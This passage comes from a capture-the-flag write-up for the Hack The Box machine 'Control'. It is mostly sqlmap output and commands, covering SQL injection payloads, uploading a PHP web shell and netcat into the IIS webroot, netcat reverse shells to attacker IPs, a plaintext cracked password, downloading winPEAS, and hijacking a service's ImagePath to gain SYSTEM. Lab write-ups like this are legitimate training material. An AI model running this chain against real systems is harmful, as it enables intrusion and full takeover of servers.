Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:13:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:13:58] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts')'
SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts'): '# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n#\r\n# This file contains the mappings of IP addresses to host names. Each\r\n# entry should be kept on an individual line. The IP address should\r\n# be placed in the first column followed by the corresponding host name.\r\n# The IP address and the host name should be separated by at least one\r\n# space.\r\n#\r\n# Additionally, comments (such as these) may be inserted on individual\r\n# lines or following the machine name denoted by a '#' symbol.\r\n#\r\n# For example:\r\n#\r\n# 102.54.94.97 rhino.acme.com # source server\r\n# 38.25.63.10 x.acme.com # x client host\r\n\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1 localhost\r\n#\t::1 localhost\r\n'
[10:13:59] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
6.1 Arbitrary File Upload
Our next step is to upload a PHP Web Shell that will allow us to execute files on the remote system.
sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' --file-dest 'C:/inetpub/wwwroot/undergrad.php'
___
__H__
___ ___["]_____ ___ ___ {1.4.2#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:20:55 /2020-03-05/
[10:20:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:20:55] [INFO] resuming back-end DBMS 'mysql'
[10:20:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:20:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:20:56] [INFO] fingerprinting the back-end DBMS operating system
[10:20:56] [INFO] the back-end DBMS operating system is Windows
[10:20:57] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[10:21:01] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
do you want confirmation that the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/undergrad.php')? [Y/n]
[10:21:03] [INFO] the local file '/home/johnd/Github/Reverse Shells/PHP Reverse Web Shells/Simple-PHP-Web-Shell/index.php' and the remote file 'C:/inetpub/wwwroot/undergrad.php' have the same size (1770 B)
[10:21:03] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 10:21:03 /2020-03-05/
Navigating to http://10.10.10.167/undergrad.php we can see that our reverse shell uploaded successfully.
7. Getting User Flag
Next we upload the netcat executable in order to give us a reverse shell
sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --file-write '/usr/share/windows-resources/binaries/nc.exe' --file-dest 'C:/inetpub/wwwroot/undergrad.exe' ___
__H__
___ ___["]_____ ___ ___ {1.4.2#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:26:18 /2020-03-05/
[10:26:18] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:26:18] [INFO] resuming back-end DBMS 'mysql'
[10:26:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:26:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:26:18] [INFO] fingerprinting the back-end DBMS operating system
[10:26:18] [INFO] the back-end DBMS operating system is Windows
[10:26:58] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:27:38] [INFO] the local file '/usr/share/windows-resources/binaries/nc.exe' and the remote file 'C:/inetpub/wwwroot/undergrad.exe' have the same size (59392 B)
[10:27:38] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 10:27:38 /2020-03-05/
Going back to our webshell we execute the following command:
undergrad.exe -e powershell.exe 10.10.15.5 4444
As can be seen in Figure 19 we have successfully executed a reverse shell and are operating as the user nt authority\iusr which is a built-in user for Microsoft IIS. Checking user accounts - Figure 19 we can see an account belonging to Hector. Having already cracked hectors password earlier we can escalate our privs to this user using powershell by creating a PSCredential object and passing the -Credential flag in Invoke-Command.
Setting up the object:
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Fidelity\Hector", $pass)
Next create another Netcat listener on a different port on the attacker machine.
We can now use the Invoke-Command to execute our reverse shell.
Invoke-Command -Computer Fidelity -Credential $cred -ScriptBlock { cmd.exe "/c C:\inetpub\wwwroot\undergrad.exe -e powershell.exe 10.10.15.5 5555" }
8. Privilege Escalation
Checking the user permissions and groups doesn't result in much. Next we can upload some windows privilege escalations scripts to help with finding potential attack vectors
We can use the simple HTTP server module in python to host the files on our attacker pc and then use powershell to retrieve them
Invoke-WebRequest http://10.10.15.58:8000/winPEAS.exe -OutFile C:\Users\Hector\Documents\winPeas.exe
None of this scripts revealed much. The next step was to check what services Hector has control over. We can discover this by running this ugly PS-cmd script:
get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path"
9. Getting Root.txt
9.1 Trusted Service Paths
We abuse more or less any of these services (in this case wuauserv) to execute a netcat shell with administrators privileges. To do this we first check the current ImagePath
Next we modify the ImagePath to execute a netcat shell (undergrad.exe that we uploaded in Section 6.1)
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\undergrad.exe 10.10.15.174 6666 -e cmd.exe" /f
Next we setup our listener.
Finally we start the service using the command sc.exe start wuauserv and we should have successfully received a reverse shell that allows us to retrieve the root.txt flag
Last updated
